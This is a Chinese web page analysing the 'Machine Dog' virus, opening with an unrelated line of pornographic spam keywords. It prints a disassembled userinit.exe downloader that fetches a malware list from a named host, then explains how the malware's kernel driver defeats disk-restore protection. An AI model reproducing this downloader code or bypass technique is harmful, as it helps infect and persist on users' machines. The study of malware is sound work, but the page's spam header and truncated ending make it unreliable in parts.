国产一级a片免费看高清,亚洲熟女中文字幕在线视频,黄三级高清在线播放,免费黄色视频在线看

機器狗病毒入侵源碼
0040045A > $ 55             push ebp                         ; (初始 cpu 選擇)
0040045B . 8BEC          mov ebp,esp
0040045D . 81C4 E8FEFFFF    add esp,-118
00400463 . 68 9C0A4000       push userinit.00400A9C                ; /user32.dll
00400468 . E8 55020000       call <jmp.&kernel32.LoadLibraryA>           ; \LoadLibraryA
0040046D . 0BC0          or eax,eax
0040046F . 74 11          je short userinit.00400482
00400471 . 68 A70A4000       push userinit.00400AA7                ; /loadremotefonts
00400476 . 50             push eax                         ; |hModule
00400477 . E8 34020000       call <jmp.&kernel32.GetProcAddress>       ; \GetProcAddress
0040047C . 0BC0          or eax,eax
0040047E . 74 02          je short userinit.00400482
00400480 . FFD0          call eax                         ; USER32.LoadRemoteFonts
00400482 > 8D45 FC           lea eax,dword ptr ss:[ebp-4]
00400485 . 50             push eax                         ; /pHandle
00400486 . 68 19000200       push 20019                         ; |Access = KEY_READ
0040048B . 6A 00          push 0                             ; |Reserved = 0
0040048D . 68 B70A4000       push userinit.00400AB7                ; |software\microsoft\windows nt\currentversion\winlogon
00400492 . 68 02000080       push 80000002                      ; |hKey = HKEY_LOCAL_MACHINE
00400497 . E8 5C020000       call <jmp.&advapi32.RegOpenKeyExA>           ; \RegOpenKeyExA
0040049C . 0BC0          or eax,eax                         //打開注冊表檢測winlogon鍵值
0040049E . 75 48          jnz short userinit.004004E8
004004A0 . C745 F8 04010000     mov dword ptr ss:[ebp-8],104
004004A7 . 68 04010000       push 104                         ; /Length = 104 (260.)
004004AC . 8D85 F4FEFFFF    lea eax,dword ptr ss:[ebp-10C]          ; |
004004B2 . 50             push eax                         ; |Destination
004004B3 . E8 16020000       call <jmp.&kernel32.RtlZeroMemory>           ; \RtlZeroMemory
004004B8 . 8D45 F8           lea eax,dword ptr ss:[ebp-8]
004004BB . 50             push eax                         ; /pBufSize
004004BC . 8D85 F4FEFFFF    lea eax,dword ptr ss:[ebp-10C]          ; |
004004C2 . 50             push eax                         ; |Buffer
004004C3 . 6A 00          push 0                             ; |pValueType = NULL
004004C5 . 6A 00          push 0                             ; |Reserved = NULL
004004C7 . 68 960A4000       push userinit.00400A96                ; |shell
004004CC . FF75 FC           push dword ptr ss:[ebp-4]                 ; |hKey
004004CF . E8 2A020000       call <jmp.&advapi32.RegQueryValueExA>       ; \RegQueryValueExA
004004D4 . 8D85 F4FEFFFF    lea eax,dword ptr ss:[ebp-10C]
004004DA . 50             push eax                         ; /Arg1
004004DB . E8 50FDFFFF       call userinit.00400230                ; \userinit.00400230 CreateProcessA
004004E0 . FF75 FC           push dword ptr ss:[ebp-4]                 ; /hKey
004004E3 . E8 0A020000       call <jmp.&advapi32.RegCloseKey>           ; \RegCloseKey
004004E8 > 68 E8030000       push 3E8                         ; /Timeout = 1000. ms
004004ED . E8 E8010000       call <jmp.&kernel32.Sleep>             ; \Sleep
004004F2 . 6A 00          push 0
004004F4 . 8D45 F8           lea eax,dword ptr ss:[ebp-8]
004004F7 . 50             push eax
004004F8 . E8 13020000       call <jmp.&wininet.InternetGetConnectedState>    ;看網(wǎng)絡是否連接
004004FD . 0BC0          or eax,eax
004004FF . 75 02          jnz short userinit.00400503
00400501 .^ EB E5          jmp short userinit.004004E8
00400503 > 68 04010000       push 104                         ; /Length = 104 (260.)
00400508 . 8D85 F4FEFFFF    lea eax,dword ptr ss:[ebp-10C]          ; |
0040050E . 50             push eax                         ; |Destination
0040050F . E8 BA010000       call <jmp.&kernel32.RtlZeroMemory>           ; \RtlZeroMemory
00400514 . 8D85 F4FEFFFF    lea eax,dword ptr ss:[ebp-10C]
0040051A . 50             push eax                         ; /TempName
0040051B . 6A 00          push 0                             ; |Unique = 0
0040051D . 6A 00          push 0                             ; |Prefix = NULL
0040051F . 68 940A4000       push userinit.00400A94                ; |.
00400524 . E8 93010000       call <jmp.&kernel32.GetTempFileNameA>       ; \GetTempFileNameA           ;生成下載病毒列表得文件名
00400529 > 68 E8030000       push 3E8                         ; /Timeout = 1000. ms
0040052E . E8 A7010000       call <jmp.&kernel32.Sleep>             ; \Sleep
00400533 . 68 88130000       push 1388                         ; /Arg3 = 00001388
00400538 . 8D85 F4FEFFFF    lea eax,dword ptr ss:[ebp-10C]          ; |
0040053E . 50             push eax                         ; |Arg2
0040053F . 68 ED0A4000       push userinit.00400AED                ; |http://2.joppnqq.com/test.cer ;       ;病毒列表
00400544 . E8 2CFDFFFF       call userinit.00400275                ; \userinit.00400275 ;里面事下載并讀取病毒列表下載病毒~
00400549 . 0BC0          or eax,eax
0040054B . 0F84 17010000    je userinit.00400668
00400551 . C705 900A4000 00000000 mov dword ptr ds:[400A90],0
0040055B . 6A 00          push 0                             ; /hTemplateFile = NULL
0040055D . 6A 00          push 0                             ; |Attributes = 0
0040055F . 6A 03          push 3                             ; |Mode = OPEN_EXISTING
00400561 . 6A 00          push 0                             ; |pSecurity = NULL
00400563 . 6A 00          push 0                             ; |ShareMode = 0
00400565 . 68 00000080       push 80000000                      ; |Access = GENERIC_READ
0040056A . 8D85 F4FEFFFF    lea eax,dword ptr ss:[ebp-10C]          ; |
00400570 . 50             push eax                         ; |FileName
00400571 . E8 16010000       call <jmp.&kernel32.CreateFileA>           ; \CreateFileA
00400576 . 83F8 FF           cmp eax,-1
00400579 . 0F84 E2000000    je userinit.00400661
0040057F . 8985 F0FEFFFF    mov dword ptr ss:[ebp-110],eax
00400585 . 6A 00          push 0                             ; /pFileSizeHigh = NULL
00400587 . FFB5 F0FEFFFF    push dword ptr ss:[ebp-110]             ; |hFile
0040058D . E8 18010000       call <jmp.&kernel32.GetFileSize>           ; \GetFileSize
00400592 . 83F8 0F           cmp eax,0F
00400595 . 73 0D          jnb short userinit.004005A4
00400597 . FFB5 F0FEFFFF    push dword ptr ss:[ebp-110]             ; /hObject
0040059D . E8 E4000000       call <jmp.&kernel32.CloseHandle>           ; \CloseHandle
......................................................................................................................
00400676 . 6A 64          push 64                             ; /Timeout = 100. ms
00400678 . E8 5D000000       call <jmp.&kernel32.Sleep>             ; \Sleep
0040067D .^ EB EE          jmp short userinit.0040066D
0040067F > 6A 00          push 0                             ; /ExitCode = 0
00400681 . E8 1E000000       call <jmp.&kernel32.ExitProcess>           ; \ExitProcess
很精典呀，，里面涉及到了在匯編下如何操作注冊表，從指定網(wǎng)址下載文件到臨時文件第三節(jié)：機器狗病毒入侵原理

機器狗原理：
建立磁盤底層驅(qū)動。
1.校驗IDT的NPXSegment Overrun（09）和Page Fault（OE）的矢量地址，如果存在，則把高16位設置為0，這個過程和還原軟件的原理是一樣的，就是對OE的HOOK檢驗。
2.給自己找個位置，查找驅(qū)動資源中的1000/1000，然后COPY到ALLOVER緩沖區(qū)中。
3.建立物理磁盤PhysicalHardDISK0的\Device----DosDevices的底層借口，針對“IRP_MJ_CREATE”“IRP_MJ_CLOSE”“IRP_MJ_DEVICE_CONTROL”響應。“IRP_MJ_CREATE”斷開\Device\Harddisk0\DR0-1上的附屬部件。從而使磁盤OS層提供的應用層文件系統(tǒng)鑒聽校驗失效。
然后通過“I_M_C ”中恢復DR0-1上的附加。并在I_M_D_C中對0x0004f8E——0xF0003C0F作出響應，把ALLOVER緩沖區(qū)中找到的數(shù)據(jù)解密并返回應用層。通過KEY-s查表產(chǎn)生密鑰。0x0004f8E——0xF0003C0F字段會將用戶態(tài)代碼作為源基，對其運算后得到字串KEY，用來對源驅(qū)動解密后，反還給用戶層。
在這個過程中，有個大家比較熟悉的截面，就是系統(tǒng)由于磁盤底層驅(qū)動校驗不成功而出現(xiàn)的藍屏截面，最常見的是初始值0x0004f8E，比如，早期的SATAⅠ在保護卡狀態(tài)下出現(xiàn)物理壞道（0%—1%），就是這個藍屏代碼。很多由于用戶態(tài)的軟件安裝不當，引起的藍屏也出現(xiàn)在這一區(qū)段中。在解除DR0-1上的附屬部件時，出現(xiàn)邏輯性錯誤就導致大家常見的中機器狗后的藍屏。多見于多處理器平臺。一般的PC是不會出現(xiàn)這個錯誤的，也就是說，大多數(shù)中招后都能正常使用，就是木馬多多，呵呵。
繼續(xù)正題，以上過程反映到IE上是這樣的：1.釋放底層驅(qū)動程序（比如變種前的PCIHDD.SYS）或者高位數(shù)用戶態(tài)臨時驅(qū)動（變種后，可以有可執(zhí)行程序引導，如“Usrinit.exe”）
2.定位WINDOWS系統(tǒng)中的userinit.exe。（通過MBR和第一引導扇區(qū)參數(shù)來定位文件磁盤矢量偏移。）
3.并校驗RF文件與地位后讀取的數(shù)據(jù)位置的正確性。
4.將獲取的代碼參數(shù)返回給底層驅(qū)動，控制0x0004f8E——0xF0003C0F段為，最后將返回值（TQ）直接寫入userinit.exe數(shù)據(jù)所在的第一蔟。這里要大家特別注意以下，通過用戶態(tài)的shell調(diào)用，作者只需一點變動，就可以隨即抓取用戶態(tài)引導文件，所以，目前的改名設權限都是沒用的。
甚至，他可以把這個過程省略，象凈網(wǎng)先鋒那樣，把Shell進程寫入動態(tài)連接庫。那么，還原就沒用了。還會帶來網(wǎng)絡負載問題，可能是作者比較仁慈吧。
好了，分析了以上的過程，解決的辦法就出來了，就是要通過對操作系統(tǒng)的內(nèi)核編譯，將他所定位的目的地址占據(jù)，這樣，除非是格式化，否則，任何操作的不會在底層奪取該位置。（不要問權限問題，在底層是沒有這個說法的，先入為主。）
這篇是講得比較專業(yè)點兒的，基本上把機器狗如何在底層獲取控制權限過程都講解了。
夾并啟動運行，以及如何調(diào)用系統(tǒng)級動態(tài)。